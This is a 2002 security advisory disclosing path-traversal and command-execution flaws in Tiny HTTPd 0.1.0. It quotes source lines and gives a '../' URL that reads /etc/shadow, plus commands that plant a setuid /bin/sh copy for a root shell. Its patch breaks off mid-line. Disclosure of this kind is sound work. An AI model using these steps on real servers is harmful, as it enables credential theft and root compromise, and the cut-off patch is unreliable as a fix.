======================================== INetCop Security Advisory #2002-0x82-001 ======================================== * Title: Multiple vulnerabilities in Tiny HTTPd. 0x01. Description Tiny HTTP daemon is web server that do simple very. Vulnerability and executable vulnerability that this web server can read file i n remote exist. And is exposed in some buffer overflow vulnerability. Vulnerability can find in line under 'httpd.c'. __ 110 cgi = 1; 111 if (!cgi) // because cgi is not, read file. 112 serve_file(client, path); 113 else 114 execute_cgi(client, path, method, query_string); // cgi executes. 115 } 116 close(client); 117 } -- Can see serve_file() in line:359. __ 359 void serve_file(int client, const char *filename) ... 367 resource = fopen(filename, "r"); ... 373 cat(client, resource); -- Display file that read cat() in line:143. __ 143 void cat(int client, FILE *resource) ... 149 send(client, buf, strlen(buf), 0); -- Can examine function that execute cgi in line:185. __ 185 void execute_cgi(int client, const char *path, 186 const char *method, const char *query_string) ... 249 execl(path, path, NULL); 250 exit(0); -- Vulnerability happens because web server does not filter "../". Herewith, vulnerability can do exploit. 0x02. Vulnerable Packages Vendor site: http://tinyhttpd.sourceforge.net/ tinyhttpd 0.1.0 -tinyhttpd-0.1.0.tar.gz +SunOS/Solaris +Linux +Other 0x03. Exploit Remote show files exploit, command execution exploit ! 1) Web server can be executed as root competence. As following, read interior l ocal file. http://tiniwebserver/../../../../../../../etc/shadow 2) Local root acquisition does exploit as following. bash$ cat > test; chmod +x test #!/bin/sh cp /bin/sh /tmp/sh chmod 4755 /tmp/sh ^C bash$ Connected in remote. bash$ lynx http://localhost/../../../../../../../tmp/test bash$ /tmp/sh -i bash# 0x04. Patch === httpd.patch === --- httpd.c Sun Apr 22 09:13:13 2001 +++ httpd.patch.c Thu Oct 17 19:07:41 2002 @@ -55,6 +55,7 @@ char method[255]; char url[255]; char path[512]; + int t; size_t i, j; struct stat st; int cgi = 0; /* becomes true if server decides this is a CGI @@ -88,6 +89,15 @@ i++; j++; } url[i] = '\0'; + + for(t=0;t